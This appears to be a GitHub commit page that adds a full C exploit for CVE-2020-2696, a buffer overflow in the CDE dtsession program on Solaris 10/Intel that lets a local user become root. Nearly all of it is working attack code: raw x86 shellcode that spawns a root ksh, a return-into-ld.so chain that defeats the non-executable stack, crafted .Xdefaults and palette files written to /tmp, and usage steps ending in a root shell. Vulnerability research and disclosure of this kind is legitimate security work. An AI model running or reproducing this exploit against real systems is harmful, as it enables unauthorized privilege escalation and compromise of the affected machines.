STRLCPY/0xdea-exploits

Add exploit for CVE-2020-2696
raptor committed with GitHub 4 years ago

0eea9a95

1 parent 06f89a2e

Total 1 files

■ ■ ■ ■ ■ ■

solaris/raptor_dtsession_ipa.c

1	+	/*
2	+	* raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel
3	+	* Copyright (c) 2019-2020 Marco Ivaldi <[email protected]>
4	+	*
5	+	* A buffer overflow in the CheckMonitor() function in the Common Desktop
6	+	* Environment 2.3.1 and earlier and 1.6 and earlier, as distributed with
7	+	* Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain
8	+	* root privileges via a long palette name passed to dtsession in a malicious
9	+	* .Xdefaults file (CVE-2020-2696).
10	+	*
11	+	* "I always loved Sun because it was so easy to own. Now with Solaris 11 I
12	+	* don't like it anymore." -- ~B.
13	+	*
14	+	* This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
15	+	* protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
16	+	* space, try returning to sprintf() instead of strcpy().
17	+	*
18	+	* I haven't written a Solaris/SPARC version because I don't have a SPARC box
19	+	* on which Solaris 10 can run. If anybody is kind enough to give me access to
20	+	* such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
21	+	*
22	+	* Usage:
23	+	* $ gcc raptor_dtsession_ipa.c -o raptor_dtsession_ipa -Wall
24	+	* [on your xserver: disable the access control]
25	+	* $ ./raptor_dtsession_ipa 192.168.1.1:0
26	+	* [...]
27	+	* # id
28	+	* uid=0(root) gid=1(other)
29	+	* #
30	+	*
31	+	* Tested on:
32	+	* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
33	+	* [previous Solaris versions are also likely vulnerable]
34	+	*/
35	+
36	+	#include <fcntl.h>
37	+	#include <link.h>
38	+	#include <procfs.h>
39	+	#include <stdio.h>
40	+	#include <stdlib.h>
41	+	#include <strings.h>
42	+	#include <unistd.h>
43	+	#include <sys/stat.h>
44	+	#include <sys/systeminfo.h>
45	+	#include <sys/types.h>
46	+
47	+	#define INFO1 "raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel"
48	+	#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <[email protected]>"
49	+
50	+	#define VULN "/usr/dt/bin/dtsession" // the vulnerable program
51	+	#define BUFSIZE 256 // size of the palette name
52	+	#define PADDING 3 // padding in the palette name
53	+	#define PAYSIZE 1024 // size of the payload
54	+	#define OFFSET env_len / 2 // offset to the shellcode
55	+
56	+	char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
57	+	/* double setuid() */
58	+	"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
59	+	"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
60	+	/* execve() */
61	+	"\x31\xc0\x50\x68/ksh\x68/bin"
62	+	"\x89\xe3\x50\x53\x89\xe2\x50"
63	+	"\x52\x53\xb0\x3b\x50\xcd\x91";
64	+
65	+	/* globals */
66	+	char *env[256];
67	+	int env_pos = 0, env_len = 0;
68	+
69	+	/* prototypes */
70	+	int add_env(char *string);
71	+	void check_zero(int addr, char *pattern);
72	+	int search_ldso(char *sym);
73	+	int search_rwx_mem(void);
74	+	void set_val(char *buf, int pos, int val);
75	+
76	+	/*
77	+	* main()
78	+	*/
79	+	int main(int argc, char **argv)
80	+	{
81	+	char buf[BUFSIZE], payload[PAYSIZE];
82	+	char platform[256], release[256], display[256];
83	+	int i, payaddr;
84	+
85	+	char *arg[2] = {"foo", NULL};
86	+	int sb = ((int)argv[0] \| 0xfff); /* stack base */
87	+	int ret = search_ldso("strcpy"); /* or sprintf */
88	+	int rwx_mem = search_rwx_mem(); /* rwx memory */
89	+
90	+	FILE *fp;
91	+	char palette_file[BUFSIZE + 18];
92	+
93	+	/* print exploit information */
94	+	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
95	+
96	+	/* read command line */
97	+	if (argc != 2) {
98	+	fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
99	+	exit(1);
100	+	}
101	+	sprintf(display, "DISPLAY=%s", argv[1]);
102	+
103	+	/* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
104	+	memset(payload, '\x90', PAYSIZE);
105	+	payload[PAYSIZE - 1] = 0x0;
106	+	memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));
107	+
108	+	/* fill the envp, keeping padding */
109	+	add_env(payload);
110	+	add_env(display);
111	+	add_env("HOME=/tmp");
112	+	add_env(NULL);
113	+
114	+	/* calculate the payload address */
115	+	payaddr = sb - OFFSET;
116	+
117	+	/* prepare the evil palette name */
118	+	memset(buf, 'A', sizeof(buf));
119	+	buf[sizeof(buf) - 1] = 0x0;
120	+
121	+	/* fill with function address in ld.so.1, saved eip, and arguments */
122	+	for (i = PADDING; i < BUFSIZE - 16; i += 4) {
123	+	set_val(buf, i, ret); /* strcpy */
124	+	set_val(buf, i += 4, rwx_mem); /* saved eip */
125	+	set_val(buf, i += 4, rwx_mem); /* 1st argument */
126	+	set_val(buf, i += 4, payaddr); /* 2nd argument */
127	+	}
128	+
129	+	/* prepare the evil .Xdefaults file */
130	+	fp = fopen("/tmp/.Xdefaults", "w");
131	+	if (!fp) {
132	+	perror("error creating .Xdefaults file");
133	+	exit(1);
134	+	}
135	+	fprintf(fp, "0ColorPalette: %s\n", buf); // or 0MonochromePalette
136	+	fclose(fp);
137	+
138	+	/* prepare the evil palette file (badchars currently not handled) */
139	+	mkdir("/tmp/.dt", 0755);
140	+	mkdir("/tmp/.dt/palettes", 0755);
141	+	sprintf(palette_file, "/tmp/.dt/palettes/%s", buf);
142	+	fp = fopen(palette_file, "w");
143	+	if (!fp) {
144	+	perror("error creating palette file");
145	+	exit(1);
146	+	}
147	+	fprintf(fp, "Black\n");
148	+	fclose(fp);
149	+
150	+	/* print some output */
151	+	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
152	+	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
153	+	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
154	+	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
155	+	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
156	+	fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
157	+	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
158	+
159	+	/* run the vulnerable program */
160	+	execve(VULN, arg, env);
161	+	perror("execve");
162	+	exit(0);
163	+	}
164	+
165	+	/*
166	+	* add_env(): add a variable to envp and pad if needed
167	+	*/
168	+	int add_env(char *string)
169	+	{
170	+	int i;
171	+
172	+	/* null termination */
173	+	if (!string) {
174	+	env[env_pos] = NULL;
175	+	return env_len;
176	+	}
177	+
178	+	/* add the variable to envp */
179	+	env[env_pos] = string;
180	+	env_len += strlen(string) + 1;
181	+	env_pos++;
182	+
183	+	/* pad the envp using zeroes */
184	+	if ((strlen(string) + 1) % 4)
185	+	for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
186	+	env[env_pos] = string + strlen(string);
187	+	env_len++;
188	+	}
189	+
190	+	return env_len;
191	+	}
192	+
193	+	/*
194	+	* check_zero(): check an address for the presence of a 0x00
195	+	*/
196	+	void check_zero(int addr, char *pattern)
197	+	{
198	+	if (!(addr & 0xff) \|\| !(addr & 0xff00) \|\| !(addr & 0xff0000) \|\|
199	+	!(addr & 0xff000000)) {
200	+	fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
201	+	exit(1);
202	+	}
203	+	}
204	+
205	+	/*
206	+	* search_ldso(): search for a symbol inside ld.so.1
207	+	*/
208	+	int search_ldso(char *sym)
209	+	{
210	+	int addr;
211	+	void *handle;
212	+	Link_map *lm;
213	+
214	+	/* open the executable object file */
215	+	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
216	+	perror("dlopen");
217	+	exit(1);
218	+	}
219	+
220	+	/* get dynamic load information */
221	+	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
222	+	perror("dlinfo");
223	+	exit(1);
224	+	}
225	+
226	+	/* search for the address of the symbol */
227	+	if ((addr = (int)dlsym(handle, sym)) == NULL) {
228	+	fprintf(stderr, "sorry, function %s() not found\n", sym);
229	+	exit(1);
230	+	}
231	+
232	+	/* close the executable object file */
233	+	dlclose(handle);
234	+
235	+	check_zero(addr - 4, sym);
236	+	return addr;
237	+	}
238	+
239	+	/*
240	+	* search_rwx_mem(): search for an RWX memory segment valid for all
241	+	* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
242	+	*/
243	+	int search_rwx_mem(void)
244	+	{
245	+	int fd;
246	+	char tmp[16];
247	+	prmap_t map;
248	+	int addr = 0, addr_old;
249	+
250	+	/* open the proc filesystem */
251	+	sprintf(tmp,"/proc/%d/map", (int)getpid());
252	+	if ((fd = open(tmp, O_RDONLY)) < 0) {
253	+	fprintf(stderr, "can't open %s\n", tmp);
254	+	exit(1);
255	+	}
256	+
257	+	/* search for the last RWX memory segment before stack (last - 1) */
258	+	while (read(fd, &map, sizeof(map)))
259	+	if (map.pr_vaddr)
260	+	if (map.pr_mflags & (MA_READ \| MA_WRITE \| MA_EXEC)) {
261	+	addr_old = addr;
262	+	addr = map.pr_vaddr;
263	+	}
264	+	close(fd);
265	+
266	+	/* add 4 to the exact address NULL bytes */
267	+	if (!(addr_old & 0xff))
268	+	addr_old \|= 0x04;
269	+	if (!(addr_old & 0xff00))
270	+	addr_old \|= 0x0400;
271	+
272	+	return addr_old;
273	+	}
274	+
275	+	/*
276	+	* set_val(): copy a dword inside a buffer (little endian)
277	+	*/
278	+	void set_val(char *buf, int pos, int val)
279	+	{
280	+	buf[pos] = (val & 0x000000ff);
281	+	buf[pos + 1] = (val & 0x0000ff00) >> 8;
282	+	buf[pos + 2] = (val & 0x00ff0000) >> 16;
283	+	buf[pos + 3] = (val & 0xff000000) >> 24;
284	+	}
285	+

Add exploit for CVE-2020-2696